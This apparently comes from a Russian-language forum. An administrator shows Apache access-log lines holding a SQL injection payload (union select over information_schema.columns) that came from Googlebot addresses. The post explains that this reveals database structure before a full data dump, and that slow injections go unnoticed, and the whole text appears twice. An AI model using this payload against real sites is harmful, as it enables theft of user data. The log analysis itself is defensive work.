я обнаружил это чисто случаенно анализируя работу узла указав 'select' как параметр к утилите grep...
yurii@phoenix:~$
yurii@phoenix:~$
yurii@phoenix:~$ cat /var/log/apache2/xxxxxxx.xxxxxxxx.ua-access.log|grep select|grep -v xx\.xxx\.xx\.xx
66.249.66.11 - - [08/Apr/2010:02:39:46 +0300] "GET /user//?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_n%20ame,column_name)+from+information_schema.columns*/ HTTP/1.1" 200 6437
66.249.65.145 - - [08/Apr/2010:02:39:47 +0300] "GET /user//?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_n%20ame,column_name)+from+information_schema.columns*/ HTTP/1.1" 200 6437
66.249.66.11 - - [08/Apr/2010:02:39:58 +0300] "GET /user/*!12345limit+0+union+select+concat_ws(0x3a,table_n%20ame,column_name)+from+information_schema.columns*/ HTTP/1.1" 404 5560
yurii@phoenix:~$
yurii@phoenix:~$ host 66.249.66.11
11.66.249.66.in-addr.arpa domain name pointer crawl-66-249-66-11.googlebot.com.
yurii@phoenix:~$
yurii@phoenix:~$ host 66.249.65.145
145.65.249.66.in-addr.arpa domain name pointer crawl-66-249-65-145.googlebot.com.
yurii@phoenix:~$
ПС
для не специалистов.... паровоз после GET /user/*!12345limit+0+union+s... - это попытка выполнить SQL запрос
select table_name, column_name from information_schema.columns
если атака будет успешной то в результате выполнив такой запрос гуглобот получит структуру всех баз данных под управленим атакуемого сервера к которым имеет доступ атакованное веб приложение в формате
имя таблицы : имя колонки
следующим ходом гуглобот с помощю подоюных инъекций выгребет всю вашу базу таблиза за таблицей ... логины пользователей, почтовыме адреса, пароли или их хеши .... короче все данные до которых дотянется.
в общемто если делать инъециии неспеша то никто ниче и не заметит ... попробуй ка найди 2..3 строки в гигабайтном логе виртуального хостинга (много сотен тысяч строк) к которому имеет доступ лиш несколько админов.
yurii@phoenix:~$
yurii@phoenix:~$
yurii@phoenix:~$ cat /var/log/apache2/xxxxxxx.xxxxxxxx.ua-access.log|grep select|grep -v xx\.xxx\.xx\.xx
66.249.66.11 - - [08/Apr/2010:02:39:46 +0300] "GET /user//?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_n%20ame,column_name)+from+information_schema.columns*/ HTTP/1.1" 200 6437
66.249.65.145 - - [08/Apr/2010:02:39:47 +0300] "GET /user//?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_n%20ame,column_name)+from+information_schema.columns*/ HTTP/1.1" 200 6437
66.249.66.11 - - [08/Apr/2010:02:39:58 +0300] "GET /user/*!12345limit+0+union+select+concat_ws(0x3a,table_n%20ame,column_name)+from+information_schema.columns*/ HTTP/1.1" 404 5560
yurii@phoenix:~$
yurii@phoenix:~$ host 66.249.66.11
11.66.249.66.in-addr.arpa domain name pointer crawl-66-249-66-11.googlebot.com.
yurii@phoenix:~$
yurii@phoenix:~$ host 66.249.65.145
145.65.249.66.in-addr.arpa domain name pointer crawl-66-249-65-145.googlebot.com.
yurii@phoenix:~$
ПС
для не специалистов.... паровоз после GET /user/*!12345limit+0+union+s... - это попытка выполнить SQL запрос
select table_name, column_name from information_schema.columns
если атака будет успешной то в результате выполнив такой запрос гуглобот получит структуру всех баз данных под управленим атакуемого сервера к которым имеет доступ атакованное веб приложение в формате
имя таблицы : имя колонки
следующим ходом гуглобот с помощю подоюных инъекций выгребет всю вашу базу таблиза за таблицей ... логины пользователей, почтовыме адреса, пароли или их хеши .... короче все данные до которых дотянется.
в общемто если делать инъециии неспеша то никто ниче и не заметит ... попробуй ка найди 2..3 строки в гигабайтном логе виртуального хостинга (много сотен тысяч строк) к которому имеет доступ лиш несколько админов.
Изменено: Юрий И - 09.04.2010 22:01:31
(описание последствий такой атаки для не специалистов)